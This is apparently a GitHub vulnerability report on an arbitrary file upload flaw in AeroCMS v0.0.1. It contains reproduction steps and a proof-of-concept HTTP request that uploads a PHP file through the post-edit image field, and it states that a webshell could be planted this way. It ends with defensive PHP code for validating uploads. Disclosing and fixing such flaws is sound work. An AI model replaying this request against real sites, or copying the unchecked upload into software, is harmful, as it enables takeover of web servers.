
AeroCMS v0.0.1 Arbitrary File upload vulnerability

Open w4n95 opened this issue 2 years ago • 0 comments

  • Description

In AeroCMS v0.0.1, there is an arbitrary file upload vulnerability at /admin/posts.php?source=edit_post, through which we can upload a webshell and control the web server.

  • Steps to Reproduce

  1. Log in to the admin panel -> Posts -> View All Posts -> Edit. [screenshot]

  2. On the post edit page, the picture-upload function is available. Upload the malicious file phpinfo.php. [screenshot]

  3. After the upload succeeds, access '/images/phpinfo.php': the file was uploaded and executed. [screenshot]

  • Vulnerable Code

There is no file checking before the upload in edit_post.php. [screenshot]

  • POC

```http
POST /AeroCMS/admin/posts.php?source=edit_post&p_id=3 HTTP/1.1
Host: 192.168.111.169
Content-Length: 991
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.111.169
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryi7wHcLADqqvNM4nO
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.111.169/AeroCMS/admin/posts.php?source=edit_post&p_id=3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2m17ikpogrvubj8l2687hc3n45
Connection: close

------WebKitFormBoundaryi7wHcLADqqvNM4nO
Content-Disposition: form-data; name="post_title"

mysql
------WebKitFormBoundaryi7wHcLADqqvNM4nO
Content-Disposition: form-data; name="post_category_id"

1
------WebKitFormBoundaryi7wHcLADqqvNM4nO
Content-Disposition: form-data; name="post_user"

admin
------WebKitFormBoundaryi7wHcLADqqvNM4nO
Content-Disposition: form-data; name="post_status"

draft
------WebKitFormBoundaryi7wHcLADqqvNM4nO
Content-Disposition: form-data; name="image"; filename="phpinfo.php"
Content-Type: application/octet-stream

------WebKitFormBoundaryi7wHcLADqqvNM4nO
Content-Disposition: form-data; name="post_tags"

mysql, database
------WebKitFormBoundaryi7wHcLADqqvNM4nO
Content-Disposition: form-data; name="post_content"

AeroCMS is created with mysql database.
------WebKitFormBoundaryi7wHcLADqqvNM4nO
Content-Disposition: form-data; name="update_post"

Edit Post
------WebKitFormBoundaryi7wHcLADqqvNM4nO--
```

w4n95, Nov 27 '22 11:11
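The report's root cause is that edit_post.php stores whatever the `image` form part carries under the client-supplied filename. The handler below is an added example of the check that is missing; it is not AeroCMS code and is not the reporter's. The field name `image` and the `images/` directory come from the report; the 2 MiB limit, the JPEG/PNG/GIF allow-list and the `../images` path relative to `admin/` are assumptions.

```php
<?php
// Added example, not AeroCMS code: hardened handling of the "image" part
// that the report shows being written to images/ with no checks.
// Assumptions: images/ sits one level above admin/, a 2 MiB ceiling,
// and only JPEG/PNG/GIF are wanted.

function validate_image_upload(array $file, string $destDir): string
{
    // Reject transport-level failures before inspecting content.
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    if ($file['size'] > 2 * 1024 * 1024) {           // assumed limit
        throw new RuntimeException('file too large');
    }

    // Decide the type from the bytes on disk, never from the client's
    // filename or Content-Type (the PoC sent phpinfo.php as
    // application/octet-stream and it was still stored and executed).
    $finfo   = new finfo(FILEINFO_MIME_TYPE);
    $mime    = $finfo->file($file['tmp_name']);
    $allowed = [
        'image/jpeg' => 'jpg',
        'image/png'  => 'png',
        'image/gif'  => 'gif',
    ];
    if ($mime === false || !isset($allowed[$mime])) {
        throw new RuntimeException('unsupported image type');
    }
    // A second, independent parser must also accept it as an image.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a valid image');
    }

    // Discard the user-controlled name entirely. A random name with an
    // extension chosen by the server removes .php/.phtml and
    // double-extension tricks, and prevents overwriting existing files.
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dest = rtrim($destDir, '/') . '/' . $name;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644);   // readable, never executable
    return $name;
}

// Usage inside the edit-post handler (after the admin session check):
if (isset($_FILES['image']) && $_FILES['image']['error'] !== UPLOAD_ERR_NO_FILE) {
    try {
        $stored = validate_image_upload($_FILES['image'], __DIR__ . '/../images');
        // ... persist $stored with the post record instead of the original filename
    } catch (RuntimeException $e) {
        http_response_code(400);
        exit('Image rejected: ' . htmlspecialchars($e->getMessage()));
    }
}
```

Content sniffing and renaming stop the request in the PoC, but they should be paired with a second layer: the `images/` directory should be served with script execution disabled (for Apache, a `.htaccess` with `php_flag engine off` or a `RemoveHandler` for `.php`/`.phtml`), so that even a valid image carrying embedded PHP is only ever delivered as static bytes.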